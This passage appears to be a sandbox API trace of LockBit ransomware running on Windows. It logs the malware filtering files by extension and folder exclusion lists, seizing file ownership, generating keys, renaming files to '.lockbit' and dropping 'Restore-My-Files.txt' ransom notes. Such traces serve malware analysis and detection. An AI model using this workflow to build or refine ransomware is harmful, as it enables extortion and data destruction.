lpString2=".png") returned -1 [0080.916] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0080.916] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0080.916] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0080.916] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0080.916] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0080.916] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0080.916] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0080.916] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0080.916] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0080.917] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.917] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0080.917] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0080.917] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0080.917] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0080.917] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0080.917] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0080.917] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0080.917] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0080.917] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0080.917] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0080.917] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0080.917] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0080.917] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0080.917] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0080.917] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0080.917] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0080.917] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0080.917] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.917] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0080.917] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0080.918] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0080.918] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0080.918] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Heart_SelectionSubpicture.png") returned 1 [0080.918] lstrcmpiW (lpString1="ntldr", lpString2="Heart_SelectionSubpicture.png") returned 1 [0080.918] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Heart_SelectionSubpicture.png") returned 1 [0080.918] lstrcmpiW (lpString1="bootsect.bak", lpString2="Heart_SelectionSubpicture.png") returned -1 [0080.918] lstrcmpiW (lpString1="autorun.inf", lpString2="Heart_SelectionSubpicture.png") returned -1 [0080.918] lstrcmpiW (lpString1="thumbs.db", lpString2="Heart_SelectionSubpicture.png") returned 1 [0080.918] lstrcmpiW (lpString1="iconcache.db", lpString2="Heart_SelectionSubpicture.png") returned 1 [0080.918] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\") returned="" [0080.918] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_SelectionSubpicture.png") returned=".png" [0080.918] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0080.918] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0080.918] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0080.918] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0080.918] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0080.918] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0080.918] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0080.918] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0080.919] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0080.919] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0080.919] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0080.919] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0080.919] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0080.919] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0080.919] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0080.919] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0080.919] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0080.919] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0080.919] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0080.919] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0080.919] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0080.919] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0080.919] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0080.919] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0080.919] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0080.919] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0080.919] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0080.919] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0080.919] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_SelectionSubpicture.png.lockbit") returned 82 [0080.920] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\heart_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.920] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0080.920] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0080.920] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0080.921] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0080.921] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0080.921] RtlFreeAnsiString (AnsiString="\\") [0080.921] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6b908 | out: TokenHandle=0x3d6b908*=0x3a0) returned 0x0 [0080.921] malloc (_Size=0x200) returned 0x77d800 [0080.921] NtQueryInformationToken (in: TokenHandle=0x3a0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6b900 | out: TokenInformation=0x77d800, ReturnLength=0x3d6b900) returned 0x0 [0080.921] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6b6bc, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.921] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6b6bc, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.921] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_SelectionSubpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.922] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_SelectionSubpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.922] CloseHandle (hObject=0x3a0) returned 1 [0080.922] free (_Block=0x77d800) [0080.922] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\heart_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3a0 [0080.923] CreateIoCompletionPort (FileHandle=0x3a0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0080.923] malloc (_Size=0x40068) returned 0x3d70048 [0080.923] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=4728) returned 1 [0080.923] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.923] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.923] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0080.923] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.924] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.924] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0080.924] ReadFile (in: hFile=0x3a0, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0080.929] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_SelectionSubpicture.png.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_SelectionSubpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0080.929] malloc (_Size=0xba) returned 0x77d800 [0080.929] NtSetInformationFile (FileHandle=0x3a0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xba, FileInformationClass=0xa) returned 0x0 [0080.930] free (_Block=0x77d800) [0080.930] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_SelectionSubpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned 1 [0080.930] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt") returned 65 [0080.930] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.930] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6eeebddb, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6eeebddb, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1240d9, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x166e, dwReserved0=0x520150, dwReserved1=0x0, cFileName="Heart_VideoInset.png", cAlternateFileName="")) returned 1 [0080.930] lstrcmpiW (lpString1=".", lpString2="Heart_VideoInset.png") returned -1 [0080.930] lstrcmpiW (lpString1="..", lpString2="Heart_VideoInset.png") returned -1 [0080.930] PathFindExtensionW (pszPath="Heart_VideoInset.png") returned=".png" [0080.930] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0080.930] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0080.930] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0080.930] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0080.931] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0080.931] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0080.931] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0080.931] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0080.931] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0080.931] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0080.931] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0080.931] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0080.931] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0080.931] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0080.931] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0080.931] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0080.931] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0080.931] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0080.931] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0080.931] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0080.931] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0080.931] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0080.931] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0080.931] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0080.931] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.931] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0080.932] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0080.932] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0080.932] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0080.932] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0080.932] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0080.932] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0080.932] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0080.932] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0080.932] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0080.932] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0080.932] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0080.932] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0080.932] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0080.932] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0080.932] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0080.932] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0080.932] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.932] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0080.932] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0080.932] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0080.932] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0080.932] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Heart_VideoInset.png") returned 1 [0080.933] lstrcmpiW (lpString1="ntldr", lpString2="Heart_VideoInset.png") returned 1 [0080.933] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Heart_VideoInset.png") returned 1 [0080.933] lstrcmpiW (lpString1="bootsect.bak", lpString2="Heart_VideoInset.png") returned -1 [0080.933] lstrcmpiW (lpString1="autorun.inf", lpString2="Heart_VideoInset.png") returned -1 [0080.933] lstrcmpiW (lpString1="thumbs.db", lpString2="Heart_VideoInset.png") returned 1 [0080.933] lstrcmpiW (lpString1="iconcache.db", lpString2="Heart_VideoInset.png") returned 1 [0080.933] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\") returned="" [0080.933] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_VideoInset.png") returned=".png" [0080.933] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0080.933] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0080.933] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0080.933] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0080.933] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0080.933] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0080.933] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0080.933] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0080.933] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0080.933] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0080.933] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0080.933] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0080.933] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0080.933] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0080.934] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0080.934] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0080.934] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0080.934] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0080.934] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0080.934] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0080.934] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0080.934] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0080.934] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0080.934] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0080.934] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0080.934] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0080.934] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0080.934] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0080.934] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_VideoInset.png.lockbit") returned 73 [0080.934] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_VideoInset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\heart_videoinset.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.935] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0080.935] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0080.935] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0080.935] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0080.936] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0080.936] RtlFreeAnsiString (AnsiString="\\") [0080.936] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6b908 | out: TokenHandle=0x3d6b908*=0x3c4) returned 0x0 [0080.936] malloc (_Size=0x200) returned 0x77d800 [0080.936] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6b900 | out: TokenInformation=0x77d800, ReturnLength=0x3d6b900) returned 0x0 [0080.936] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6b6bc, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.936] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6b6bc, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.936] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_VideoInset.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.937] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_VideoInset.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.937] CloseHandle (hObject=0x3c4) returned 1 [0080.937] free (_Block=0x77d800) [0080.937] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_VideoInset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\heart_videoinset.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0080.937] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0080.937] malloc (_Size=0x40068) returned 0x1fb18c0 [0080.937] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=5742) returned 1 [0080.937] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.938] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.938] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0080.938] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.938] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.938] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0080.938] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0080.944] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_VideoInset.png.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_VideoInset.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0080.945] malloc (_Size=0xa8) returned 0x77d800 [0080.945] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa8, FileInformationClass=0xa) returned 0x0 [0080.945] free (_Block=0x77d800) [0080.945] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_VideoInset.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned 1 [0080.945] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt") returned 65 [0080.945] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.945] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa0fd11ff, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa787f65, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa108fe2a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x520150, dwReserved1=0x0, cFileName="HueCycle", cAlternateFileName="")) returned 1 [0080.945] lstrcmpiW (lpString1=".", lpString2="HueCycle") returned -1 [0080.946] lstrcmpiW (lpString1="..", lpString2="HueCycle") returned -1 [0080.946] lstrcmpiW (lpString1="HueCycle", lpString2="$windows.~bt") returned 1 [0080.946] lstrcmpiW (lpString1="HueCycle", lpString2="intel") returned -1 [0080.946] lstrcmpiW (lpString1="HueCycle", lpString2="msocache") returned -1 [0080.946] lstrcmpiW (lpString1="HueCycle", lpString2="$recycle.bin") returned 1 [0080.946] lstrcmpiW (lpString1="HueCycle", lpString2="$windows.~ws") returned 1 [0080.946] lstrcmpiW (lpString1="HueCycle", lpString2="tor browser") returned -1 [0080.946] lstrcmpiW (lpString1="HueCycle", lpString2="boot") returned 1 [0080.946] lstrcmpiW (lpString1="HueCycle", lpString2="system volume information") returned -1 [0080.946] lstrcmpiW (lpString1="HueCycle", lpString2="perflogs") returned -1 [0080.946] lstrcmpiW (lpString1="HueCycle", lpString2="google") returned 1 [0080.946] lstrcmpiW (lpString1="HueCycle", lpString2="application data") returned 1 [0080.946] lstrcmpiW (lpString1="HueCycle", lpString2="windows") returned -1 [0080.946] lstrcmpiW (lpString1="HueCycle", lpString2="windows.old") returned -1 [0080.946] lstrcmpiW (lpString1="HueCycle", lpString2="appdata") returned 1 [0080.946] lstrcmpiW (lpString1="HueCycle", lpString2="Windows nt") returned -1 [0080.946] lstrcmpiW (lpString1="HueCycle", lpString2="Msbuild") returned -1 [0080.946] lstrcmpiW (lpString1="HueCycle", lpString2="Microsoft") returned -1 [0080.946] lstrcmpiW (lpString1="HueCycle", lpString2="All users") returned 1 [0080.946] lstrcmpiW (lpString1="HueCycle", lpString2="mozilla") returned -1 [0080.946] lstrcmpiW (lpString1="HueCycle", lpString2="Microsoft.NET") returned -1 [0080.947] lstrcmpiW (lpString1="HueCycle", lpString2="microsoft shared") returned -1 [0080.947] lstrcmpiW (lpString1="HueCycle", lpString2="Internet Explorer") returned -1 [0080.947] lstrcmpiW (lpString1="HueCycle", lpString2="common files") returned 1 [0080.947] lstrcmpiW (lpString1="HueCycle", lpString2="opera") returned -1 [0080.947] lstrcmpiW (lpString1="HueCycle", lpString2="Windows Journal") returned -1 [0080.947] wsprintfW (in: param_1=0x3d6b928, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle") returned 53 [0080.947] wsprintfW (in: param_1=0x3d6ad00, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\*") returned 55 [0080.947] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\*", fInfoLevelId=0x0, lpFindFileData=0x3d6b120, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x3d6b120) returned 0x55fe78 [0080.955] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0080.955] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa0fd11ff, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa787f65, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa108fe2a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0080.955] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0080.956] lstrcmpiW 